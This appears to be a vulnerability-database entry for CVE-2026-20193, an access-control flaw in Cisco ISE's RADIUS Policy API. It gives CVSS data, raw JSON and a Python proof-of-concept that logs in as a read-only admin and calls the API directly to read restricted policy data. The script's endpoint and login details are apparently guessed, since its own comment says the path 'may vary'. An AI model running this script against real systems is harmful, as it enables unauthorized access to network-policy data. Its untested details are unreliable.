Security Vulnerability Report
CVE-2026-20193 CVSS 4.3 MEDIUM

CVE-2026-20193

Published: 2026-05-06 17:16:22
Last Modified: 2026-05-06 18:59:53

Description

A vulnerability in the RADIUS Policy API endpoints of Cisco ISE could allow an authenticated, remote attacker with read-only Administrator privileges to gain unauthorized access to sensitive information on an affected device. This vulnerability is due to improper role-based access control (RBAC) permissions on the RADIUS Policy API endpoints. An attacker could exploit this vulnerability by bypassing the web-based management interface and directly calling an affected endpoint. A successful exploit could allow the attacker to gain unauthorized read access to sensitive RADIUS Policy details that are restricted for their role.

CVSS Details

CVSS Score: 4.3
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Cisco ISE (see the vendor security advisory for the specific affected versions)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests
import urllib3

# Suppress SSL warnings for demonstration purposes
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)


def exploit_cve_2026_20193(target_ip, username, password):
    """
    PoC for CVE-2026-20193: Cisco ISE RADIUS Policy API Bypass
    Attempts to access sensitive policy details using a read-only admin account.
    """
    session = requests.Session()

    # Step 1: Authenticate to the Cisco ISE portal
    login_url = f"https://{target_ip}:9060/admin/login"
    login_payload = {
        "username": username,
        "password": password
    }

    try:
        print(f"[*] Attempting login to {target_ip} as {username}...")
        response = session.post(login_url, data=login_payload, verify=False)

        if response.status_code != 200:
            print("[-] Login failed.")
            return

        print("[+] Login successful.")

        # Step 2: Directly call the vulnerable RADIUS Policy API endpoint
        # Note: The exact endpoint path may vary based on ISE version
        api_endpoint = f"https://{target_ip}:9060/ers/config/radiuspolicy"
        headers = {
            "Accept": "application/json",
            "Content-Type": "application/json"
        }

        print(f"[*] Sending request to vulnerable endpoint: {api_endpoint}")
        poc_response = session.get(api_endpoint, headers=headers, verify=False)

        if poc_response.status_code == 200:
            print("[+] Exploit successful! Sensitive data retrieved:")
            print(poc_response.text)
        else:
            print(f"[-] Request failed. Status code: {poc_response.status_code}")
            print(poc_response.text)

    except Exception as e:
        print(f"[!] An error occurred: {e}")


if __name__ == "__main__":
    # Replace with actual target details
    TARGET_IP = "192.168.1.100"
    USERNAME = "readonly_admin"
    PASSWORD = "password"

    exploit_cve_2026_20193(TARGET_IP, USERNAME, PASSWORD)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-20193", "sourceIdentifier": "[email protected]", "published": "2026-05-06T17:16:21.500", "lastModified": "2026-05-06T18:59:53.230", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability in the RADIUS Policy API endpoints of Cisco ISE could allow an authenticated, remote attacker with read-only Administrator privileges to gain unauthorized access to sensitive information on an affected device.\r\n\r\nThis vulnerability is due to improper role-based access control (RBAC) permissions on the RADIUS Policy API endpoints. An attacker could exploit this vulnerability by bypassing the web-based management interface and directly calling an affected endpoint. A successful exploit could allow the attacker to gain unauthorized read access to sensitive RADIUS Policy details that are restricted for their role."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-ise-unauth-bypass-uxjRXGpb", "source": "[email protected]"}]}}